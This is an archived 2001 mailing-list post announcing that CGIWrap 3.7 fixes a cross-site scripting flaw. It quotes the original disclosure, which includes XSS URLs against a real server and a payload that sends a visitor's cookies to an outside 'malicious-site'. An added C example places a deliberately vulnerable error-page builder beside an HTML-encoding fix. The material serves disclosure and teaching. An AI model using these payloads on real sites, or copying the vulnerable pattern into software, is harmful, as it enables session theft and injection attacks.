Re: [cgiwrap-users] Re: Security hole in CGIWrap (cross-site scripting vulnerability)

From: Nathan Neulinger (nneulat_private)
Date: Sun Jul 22 2001 - 10:39:03 PDT


    The following cross-site scripting vulnerability was reported in
    cgiwrap. This has just been corrected in version 3.7 which has just been
    released.
    
    http://prdownloads.sourceforge.net/cgiwrap/cgiwrap-3.7.tar.gz
    
    All error message output is now html encoded to prevent this problem.
    
    -- Nathan
    
    > "TAKAGI, Hiromitsu" wrote:
    > >
    > > Hi,
    > >
    > > I found a cross-site scripting vulnerability in CGIWrap.  Cookies
    > > issued by the server on which CGIWrap is installed can be stolen.
    > >
    > > Please try to access the following URLs.
    > >
    > > Confirming the bug:
    > >   http://www.unixtools.org/cgi-bin/cgiwrap/%3CS%3E
    > >   http://www.unixtools.org/cgi-bin/cgiwrap/>
    > >   http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/>TEST</S>
    > > JavaScript code will be executed:
    > >   http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/>alert(document.domain)</SCRIPT>
    > >   http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/>document.write(document.domain)</SCRIPT>
    > >   http://www.unixtools.org/cgi-bin/cgiwrap/)>
    > > Stealing your Cookies issued by www.unixtools.org, if any:
    > >   http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/>window.open("http://malicious-site/save.cgi%3F"+escape(document.cookie))</SCRIPT>
    > >
    <snip>
    > >
    > > Regards,
    > > --
    > > Hiromitsu Takagi, Ph.D.
    > > National Institute of Advanced Industrial Science and Technology,
    > > Tsukuba Central 2, 1-1-1, Umezono, Tsukuba, Ibaraki 305-8568, Japan
    > > http://www.etl.go.jp/~takagi/
    > 
    > _______________________________________________
    > cgiwrap-users mailing list
    > cgiwrap-usersat_private
    > http://lists.sourceforge.net/lists/listinfo/cgiwrap-users
    
    -- 
    
    
    ------------------------------------------------------------
    Nathan Neulinger                       EMail:  nneulat_private
    University of Missouri - Rolla         Phone: (573) 341-4841
    CIS - Systems Programming                Fax: (573) 341-4216
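The fix Nathan describes (HTML-encoding every error message before it is sent back to the browser) is the standard remedy for reflected cross-site scripting of this kind. The following is an added example, written for this page and not CGIWrap's own source: a small C routine that entity-encodes the five HTML-significant characters, beside an error-page builder in the pre-fix style that copies the requested path into the page verbatim and a hardened one that encodes it first. The page layout, function names, and the sample PATH_INFO string are assumptions modelled on the report above, not taken from CGIWrap.

```c
/* Added example (not CGIWrap's code): HTML-encode untrusted input before
 * reflecting it into an error page. Compile with: cc -std=c99 -Wall x.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Return a malloc'd copy of s with & < > " ' replaced by entity
 * references, so the string is inert inside an HTML text node or a
 * quoted attribute value. Caller frees the result. */
char *html_encode(const char *s)
{
    size_t need = 1;                       /* room for the NUL */
    for (const char *p = s; *p; p++) {
        switch (*p) {
        case '&':  need += 5; break;       /* &amp;  */
        case '<':  need += 4; break;       /* &lt;   */
        case '>':  need += 4; break;       /* &gt;   */
        case '"':  need += 6; break;       /* &quot; */
        case '\'': need += 5; break;       /* &#39;  */
        default:   need += 1; break;
        }
    }
    char *out = malloc(need);
    if (!out) return NULL;
    char *o = out;
    for (const char *p = s; *p; p++) {
        const char *rep = NULL;
        switch (*p) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default: break;
        }
        if (rep) { size_t n = strlen(rep); memcpy(o, rep, n); o += n; }
        else     { *o++ = *p; }
    }
    *o = '\0';
    return out;
}

/* Assumed error-page template; the %s is the only untrusted part. */
static char *format_error_page(const char *detail)
{
    const char *fmt = "<html><body><h1>CGIWrap Error</h1>"
                      "<p>Script not found: %s</p></body></html>\n";
    size_t n = strlen(fmt) + strlen(detail) + 1;
    char *page = malloc(n);
    if (page) snprintf(page, n, fmt, detail);
    return page;
}

/* Pre-fix pattern: PATH_INFO lands in the HTML unchanged, so a path
 * containing ><SCRIPT>...</SCRIPT> becomes live markup in the browser. */
char *error_page_vulnerable(const char *path_info)
{
    return format_error_page(path_info);
}

/* Post-fix pattern: encode first, then interpolate. */
char *error_page_hardened(const char *path_info)
{
    char *enc = html_encode(path_info);
    if (!enc) return NULL;
    char *page = format_error_page(enc);
    free(enc);
    return page;
}

int main(void)
{
    /* Constructed input modelled on the reporter's PATH_INFO payload. */
    const char *evil = "/~user/><SCRIPT>alert(document.domain)</SCRIPT>";
    char *v = error_page_vulnerable(evil);
    char *h = error_page_hardened(evil);
    if (!v || !h) return 1;
    printf("vulnerable (raw tag present: %s):\n%s\n",
           strstr(v, "<SCRIPT>") ? "yes" : "no", v);
    printf("hardened   (raw tag present: %s):\n%s\n",
           strstr(h, "<SCRIPT>") ? "yes" : "no", h);
    free(v);
    free(h);
    return 0;
}
```

Encoding at the output boundary, rather than trying to strip or reject "bad" characters on input, is the choice that generalises: the same `html_encode` covers any untrusted value that ends up in an HTML text node, including the `%3C`/`%3E` forms in the report, because the web server has already URL-decoded PATH_INFO by the time the wrapper sees it.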
    



    This archive was generated by hypermail 2b30 : Mon Jul 23 2001 - 08:25:41 PDT